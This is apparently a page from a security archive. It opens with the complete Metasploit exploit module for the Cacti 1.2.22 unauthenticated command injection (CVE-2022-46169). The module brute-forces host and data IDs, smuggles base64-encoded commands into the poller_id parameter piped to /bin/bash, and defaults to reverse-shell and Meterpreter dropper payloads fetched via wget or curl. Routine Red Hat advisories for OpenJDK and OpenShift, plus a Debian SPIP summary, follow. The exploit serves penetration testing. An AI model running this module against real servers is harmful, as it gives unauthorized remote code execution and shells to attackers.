This Metasploit module exploits an unauthenticated command injection vulnerability in Cacti versions through 1.2.22 in order to achieve unauthenticated remote code execution as the www-data user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Cacti 1.2.22 unauthenticated command injection',        'Description' => %q{          This module exploits an unauthenticated command injection          vulnerability in Cacti through 1.2.22 (CVE-2022-46169) in          order to achieve unauthenticated remote code execution as the          www-data user.          The module first attempts to obtain the Cacti version to see          if the target is affected. If LOCAL_DATA_ID and/or HOST_ID          are not set, the module will try to bruteforce the missing          value(s). If a valid combination is found, the module will          use these to attempt exploitation. If LOCAL_DATA_ID and/or          HOST_ID are both set, the module will immediately attempt          exploitation.          During exploitation, the module sends a GET request to          /remote_agent.php with the action parameter set to polldata          and the X-Forwarded-For header set to the provided value for          X_FORWARDED_FOR_IP (by default 127.0.0.1). In addition, the          poller_id parameter is set to the payload and the host_id          and local_data_id parameters are set to the bruteforced or          provided values. If X_FORWARDED_FOR_IP is set to an address          that is resolvable to a hostname in the poller table, and the          local_data_id and host_id values are vulnerable, the payload          set for poller_id will be executed by the target.          This module has been successfully tested against Cacti          version 1.2.22 running on Ubuntu 21.10 (vulhub docker image)        },        'License' => MSF_LICENSE,        'Author' => [          'Stefan Schiller', # discovery (independent of Steven Seeley)          'Steven Seeley', # (mr_me) @steventseeley - discovery (independent of Stefan Schiller)          'Owen Gong', # @phithon_xg - vulhub PoC          'Erik Wynter' # @wyntererik - Metasploit        ],        'References' => [          ['CVE', '2022-46169'],          ['URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf'], # disclosure and technical details          ['URL', 'https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169'], # vulhub vulnerable docker image and PoC          ['URL', 'https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution'] # analysis by Stefan Schiller        ],        'DefaultOptions' => {          'RPORT' => 8080        },        'Platform' => %w[unix linux],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Targets' => [          [            'Automatic (Unix In-Memory)',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },              'Type' => :unix_memory            }          ],          [            'Automatic (Linux Dropper)',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'CmdStagerFlavor' => ['echo', 'printf', 'wget', 'curl'],              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },              'Type' => :linux_dropper            }          ]        ],        'Privileged' => false,        'DisclosureDate' => '2022-12-05',        'DefaultTarget' => 1,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'The base path to Cacti', '/']),      OptString.new('X_FORWARDED_FOR_IP', [true, 'The IP to use in the X-Forwarded-For HTTP header. This should be resolvable to a hostname in the poller table.', '127.0.0.1']),      OptInt.new('HOST_ID', [false, 'The host_id value to use. By default, the module will try to bruteforce this.']),      OptInt.new('LOCAL_DATA_ID', [false, 'The local_data_id value to use. By default, the module will try to bruteforce this.'])    ])    register_advanced_options([      OptInt.new('MIN_HOST_ID', [true, 'Lower value for the range of possible host_id values to check for', 1]),      OptInt.new('MAX_HOST_ID', [true, 'Upper value for the range of possible host_id values to check for', 5]),      OptInt.new('MIN_LOCAL_DATA_ID', [true, 'Lower value for the range of possible local_data_id values to check for', 1]),      OptInt.new('MAX_LOCAL_DATA_ID', [true, 'Upper value for the range of possible local_data_id values to check for', 100])    ])  end  def check    # sanity check to see if the target is likely Cacti    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path)    })    unless res      return CheckCode::Unknown('Connection failed.')    end    unless res.code == 200 && res.body.include?('<title>Login to Cacti')      return CheckCode::Safe('Target is not a Cacti application.')    end    # get the version    version = res.body.scan(/Version (.*?) \| \(c\)/)&.flatten&.first    if version.blank?      return CheckCode::Detected('Could not determine the Cacti version: the HTTP response body did not match the expected format.')    end    begin      if Rex::Version.new(version) <= Rex::Version.new('1.2.22')        return CheckCode::Appears("The target is Cacti version #{version}")      else        return CheckCode::Safe("The target is Cacti version #{version}")      end    rescue StandardError => e      return CheckCode::Unknown("Failed to obtain a valid Cacti version: #{e}")    end  end  def exploitable_rrd_names    [      'apache_total_kbytes',      'apache_total_hits',      'apache_total_hits',      'apache_total_kbytes',      'apache_cpuload',      'boost_avg_size',      'boost_peak_memory',      'boost_records',      'boost_table',      'ExportDuration',      'ExportGraphs',      'syslogRuntime',      'tholdRuntime',      'polling_time',      'uptime',    ]  end  def brute_force_ids    # perform a sanity check first    if @host_id      host_ids = [@host_id]    else      if datastore['MAX_HOST_ID'] < datastore['MIN_HOST_ID']        fail_with(Failure::BadConfig, 'The value for MAX_HOST_ID is lower than MIN_HOST_ID. This is impossible')      end      host_ids = (datastore['MIN_HOST_ID']..datastore['MAX_HOST_ID']).to_a    end    if @local_data_id      local_data_ids = [@local_data_ids]    else      if datastore['MAX_LOCAL_DATA_ID'] < datastore['MIN_LOCAL_DATA_ID']        fail_with(Failure::BadConfig, 'The value for MAX_LOCAL_DATA_ID is lower than MIN_LOCAL_DATA_ID. This is impossible')      end      local_data_ids = (datastore['MIN_LOCAL_DATA_ID']..datastore['MAX_LOCAL_DATA_ID']).to_a    end    # lets make sure the module never performs more than 1,000 possible requests to try and bruteforce host_id and local_data_id    max_attempts = host_ids.length * local_data_ids.length    if max_attempts > 1000      fail_with(Failure::BadConfig, 'The number of possible HOST_ID and LOCAL_DATA_ID combinations exceeds 1000. Please limit this number by adjusting the MIN and MAX options for both parameters.')    end    potential_targets = []    request_ct = 0    print_status("Trying to bruteforce an exploitable host_id and local_data_id by trying up to #{max_attempts} combinations")    host_ids.each do |h_id|      print_status("Enumerating local_data_id values for host_id #{h_id}")      local_data_ids.each do |ld_id|        request_ct += 1        print_status("Performing request #{request_ct}...") if request_ct % 25 == 0        res = send_request_cgi(remote_agent_request(ld_id, h_id, rand(1..1000)))        unless res          print_error('No response received. Aborting bruteforce')          return nil        end        unless res.code == 200          print_error("Received unexpected response code #{res.code}. This shouldn't happen. Aborting bruteforce")          return nil        end        begin          parsed_response = JSON.parse(res.body)        rescue JSON::ParserError          print_error("The response body is not in valid JSON format. This shouldn't happen. Aborting bruteforce")          return nil        end        unless parsed_response.is_a?(Array)          print_error("The response body is not in the expected format. This shouldn't happen. Aborting bruteforce")          return nil        end        # the array can be empty, which is not an error but just means the local_data_id is not exploitable        next if parsed_response.empty?        first_item = parsed_response.first        unless first_item.is_a?(Hash) && ['value', 'rrd_name', 'local_data_id'].all? { |key| first_item.keys.include?(key) }          print_error("The response body is not in the expected format. This shouldn't happen. Aborting bruteforce")          return nil        end        # some data source types that can be exploited have a valid rrd_name. these are included in the exploitable_rrd_names array        # if we encounter one of these, we should assume the local_data_id is exploitable and try to exploit it        # in addition, some data source types have an empty rrd_name but are still exploitable        # however, if the rrd_name is blank, the only way to verify if a local_data_id value corresponds to an exploitable data source, is to actually try and exploit it        # instead of trying to exploit all potential targets of the latter category, let's just save these and print them at the end        # then the user can try to exploit them manually by setting the HOST_ID and LOCAL_DATA_ID options        rrd_name = first_item['rrd_name']        if rrd_name.empty?          potential_targets << [h_id, ld_id]        elsif exploitable_rrd_names.include?(rrd_name)          print_good("Found exploitable local_data_id #{ld_id} for host_id #{h_id}")          return [h_id, ld_id]        else          next # if we have a valid rrd_name but it's not in the exploitable_rrd_names array, we should move on        end      end    end    return nil if potential_targets.empty?    # inform the user about potential targets    print_warning("Identified #{potential_targets.length} host_id - local_data_id combination(s) that may be exploitable, but could not be positively identified as such:")    potential_targets.each do |h_id, ld_id|      print_line("\thost_id: #{h_id} - local_data_id: #{ld_id}")    end    print_status('You can try to exploit these by manually configuring the HOST_ID and LOCAL_DATA_ID options')    nil  end  def execute_command(cmd, _opts = {})    # use base64 encoding to get around special char limitations    cmd = "`echo #{Base64.strict_encode64(cmd)} | base64 -d | /bin/bash`"    send_request_cgi(remote_agent_request(@local_data_id, @host_id, cmd), 0)  end  def exploit    @host_id = datastore['HOST_ID'] if datastore['HOST_ID'].present?    @local_data_id = datastore['LOCAL_DATA_ID'] if datastore['LOCAL_DATA_ID'].present?    unless @host_id && @local_data_id      brute_force_result = brute_force_ids      unless brute_force_result        fail_with(Failure::NoTarget, 'Failed to identify an exploitable host_id - local_data_id combination.')      end      @host_id, @local_data_id = brute_force_result    end    if target.arch.first == ARCH_CMD      print_status('Executing the payload. This may take a few seconds...')      execute_command(payload.encoded)    else      execute_cmdstager(background: true)    end  end  def remote_agent_request(ld_id, h_id, poller_id)    {      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'remote_agent.php'),      'headers' => {        'X-Forwarded-For' => datastore['X_FORWARDED_FOR_IP']      },      'vars_get' => {        'action' => 'polldata',        'local_data_ids[0]' => ld_id,        'host_id' => h_id,        'poller_id' => poller_id # when bruteforcing, this is a random number, but during exploitation this is the payload      }    }  endend

Cacti 1.2.22 Command Injection

Red Hat Security Advisory 2023-0203-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit. Issues addressed include a deserialization vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: java-1.8.0-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:0203-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0203  
Issue date:        2023-01-24  
CVE Names:         CVE-2023-21830 CVE-2023-21843  
====================================================================  
1. Summary:

An update for java-1.8.0-openjdk is now available for Red Hat Enterprise  
Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64

3. Description:

The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime  
Environment and the OpenJDK 8 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper restrictions in CORBA deserialization (Serialization,  
8285021) (CVE-2023-21830)

* OpenJDK: soundbank URL remote loading (Sound, 8293742) (CVE-2023-21843)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Prepare for the next quarterly OpenJDK upstream release (2023-01, 8u362)  
(BZ#2150191)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2150191 - Prepare for the next quarterly OpenJDK upstream release (2023-01, 8u362) [rhel-7.9.z]  
2160475 - CVE-2023-21843 OpenJDK: soundbank URL remote loading (Sound, 8293742)  
2160490 - CVE-2023-21830 OpenJDK: improper restrictions in CORBA deserialization (Serialization, 8285021)

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.src.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b08-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.362.b08-1.el7_9.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.362.b08-1.el7_9.noarch.rpm

x86_64:  
java-1.8.0-openjdk-accessibility-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b08-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.src.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b08-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.362.b08-1.el7_9.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.362.b08-1.el7_9.noarch.rpm

x86_64:  
java-1.8.0-openjdk-accessibility-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b08-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.src.rpm

ppc64:  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b08-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b08-1.el7_9.ppc64.rpm

ppc64le:  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b08-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b08-1.el7_9.ppc64le.rpm

s390x:  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b08-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b08-1.el7_9.s390x.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b08-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.362.b08-1.el7_9.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.362.b08-1.el7_9.noarch.rpm

ppc64:  
java-1.8.0-openjdk-accessibility-1.8.0.362.b08-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b08-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b08-1.el7_9.ppc64.rpm

ppc64le:  
java-1.8.0-openjdk-accessibility-1.8.0.362.b08-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b08-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b08-1.el7_9.ppc64le.rpm

s390x:  
java-1.8.0-openjdk-accessibility-1.8.0.362.b08-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b08-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b08-1.el7_9.s390x.rpm

x86_64:  
java-1.8.0-openjdk-accessibility-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b08-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.src.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b08-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.362.b08-1.el7_9.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.362.b08-1.el7_9.noarch.rpm

x86_64:  
java-1.8.0-openjdk-accessibility-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b08-1.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21830  
https://access.redhat.com/security/cve/CVE-2023-21843  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY8+0P9zjgjWX9erEAQiO4A//QdKG0zEeh/mRYT/SKgMvYgoS9MPrG04/  
lcoDwPYqwPXXQNMM5sBlUUAAGc2vqWTy4zN7iOb7Kpsh6PwJZNV5vIYGTodiZ6CO  
SNYHrkohRJ02PFH8RVhMa07kzwOREesD7au0Aqr/IHjTRH2x0X1Twbmldbi16B+I  
iSMVI2mXVYYS8Ywf4ZZaTQ0gNIzk0kScitkQ05lhF0XBtnFyvcmYMgQe1AxzPotG  
sF/GgLLdqNXcxc/zGO/a1xut8/xXM5iNbHSK5LBT50P4LPNI4Me10wqEi7cy7a16  
vUvgvK9Ze57t0XdoP2qQ7+0nWsA/oKFsLd8yhesPc7ZfP+boEUpy6O7WV4ff7afj  
KJbD7K3Zcno/1O55S7VjGBytLwggBIFcBQimwGarxSroVsj0Qt0treQNGfNLctuh  
NgqrSGaxRKjSttG8vjghyJA4aPZEf1pZRkj0YZ7Tk88a74a0MrYZEF+eav17B+Of  
oFz6Qw6G/q6GpYusX04ti+YFf7EvFWuLqyA6DEJcOIoIsQQn+9esS002urBADj0v  
oIYM7juljFck+IwxshavxwF9saEECTYCJtdDRblfRmqe7cHEHBrzVGiMMXh35IGk  
pACfKV7IqS5rXBgeYL2x5VhhkEnHkY0F6dXytP5/hCqTkW4Lj+Y7cW9BjF+LuFll  
tEZVPSHt7AA=nr/N  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0203-01

Red Hat Security Advisory 2023-0395-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system.

Red Hat Security Advisory 2023-0395-01

Red Hat Security Advisory 2023-0241-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.10.50.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Low: OpenShift Container Platform 4.10.50 bug and security update  
Advisory ID:       RHSA-2023:0241-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0241  
Issue date:        2023-01-24  
CVE Names:         CVE-2023-0296  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.10.50 is now available with  
updates to packages and images that fix several bugs.

Red Hat Product Security has rated this update as having a security impact  
of Low. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.10.50. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHBA-2023:0240

Security Fix(es):

* openshift: etcd grpc-proxy vulnerable to The Birthday attack against  
64-bit block cipher (CVE-2023-0296)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html

3. Solution:

For OpenShift Container Platform 4.10 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags

The sha values for the release are:

(For x86_64 architecture)  
The image digest is  
sha256:9301ca818d705bda5981db961904f2b6e3f9adcc51e3c8e258c05950236dfc3d

(For s390x architecture)  
The image digest is  
sha256:88dd6c214ba12eb626301d40fadbf5d6d95eeaebae11f0c0fedfbfcecd1df739

(For ppc64le architecture)  
The image digest is  
sha256:baa7fe33ac04eca046892820342c19b6df02f6998f3f5e4f9471c737f6eeb301

(For aarch64 architecture)  
The image digest is  
sha256:7ac01bfe3554059f81fb573fa04cf41ca8a150b93b54d4209f4c987687e40d81

All OpenShift Container Platform 4.10 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2161287 - CVE-2023-0296 openshift: etcd grpc-proxy vulnerable to The Birthday attack against 64-bit block cipher

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-4467 - [4.10] Improve ironic logging configuration in metal3  
OCPBUGS-4717 - Unable to use application credentials for Cinder CSI after OpenStack credentials update  
OCPBUGS-4810 - MCO does not sync kubeAPIServerServingCAData to controllerconfig if there are not ready nodes  
OCPBUGS-5294 - Backport fix for OCPBUGSM-36848 to 4.10  
OCPBUGS-5299 - [4.10] [OVN]Sometimes after reboot egress node, egress IP cannot be applied anymore.  
OCPBUGS-5415 - [OCP 4.10] ironic container images have old packages  
OCPBUGS-5419 - [release-4.10] Azure: unable to configure EgressIP if an ASG is set  
OCPBUGS-5507 - [vsphere-CSI-Driver-Operator] The storageclass "thin-csi" could not be re-created after deleting  
OCPBUGS-5788 - ClusterResourceQuota values are not reflecting.

6. References:

https://access.redhat.com/security/cve/CVE-2023-0296  
https://access.redhat.com/security/updates/classification/#low

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY8+0QtzjgjWX9erEAQjtJw//Ts6EzkhU5+hsaIaT0j7Yq18Dai3sC7p6  
jCiHlRWPuoAcyzrvZbVv+62G9WaXWhQ9HuXOYjx/cPTCZe92ixeSrE8FQGDh9bgw  
fLVMtqH7F8zOQHRVspIgH8SzooS5A/ZGSCBG5wVSvVbJUCQViXmoz2xOH4DXjOmd  
RT42+aBT0KeTG6Dbj21g3VB/5faLxxrC8u55lVAlBGNyroVmLqKzPKKnlvpibjFV  
WJATXcV0885PXR8FVmF0CSZbkX+u1++7XVHhoqgQ/D8STZCvmIw/W21pcW8owYEc  
u0kBO8eTH8LKqiSbze88ENVogOaX+0HIgKmJ/3aMjyejSVPpIlmz3RA/gOG2Eguc  
vdrRJXwjFCY2kkFgcw0SqeZM/SGHj1VlWNHTjxG9Sj7XnVw6QHpT9cVFByCvFp72  
eL96I3Qb3qnhCBrLdtsIUoA3B/uDkjGFwMysRdNBUFl76HvTEQUQhxWbLAy6q/XC  
VlOnE+e2Kj9pfyWHbSbHHdeD/qXFoUenHWBL+Xow5Hvf8L5oGYo3tFahDrlip+6R  
btZwOF56IEXH5Q4Cy9UaAONPb+6TntvOLsjaTpYqeTToIsHRAOE4NbghIeJBUHM3  
P6i4Iy9vR0DyJRFvpCVRXqw1h1Wlo0Ru4Xo9rQpKyX0TVDHppKrpa1HD+GZgEETk  
aT/bFo7O4rg=aJSj  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0241-01

Debian Linux Security Advisory 5325-1 - It was discovered that SPIP, a website engine for publishing, would allow a malicious user to SQL injection attacks, or bypass authorization access.

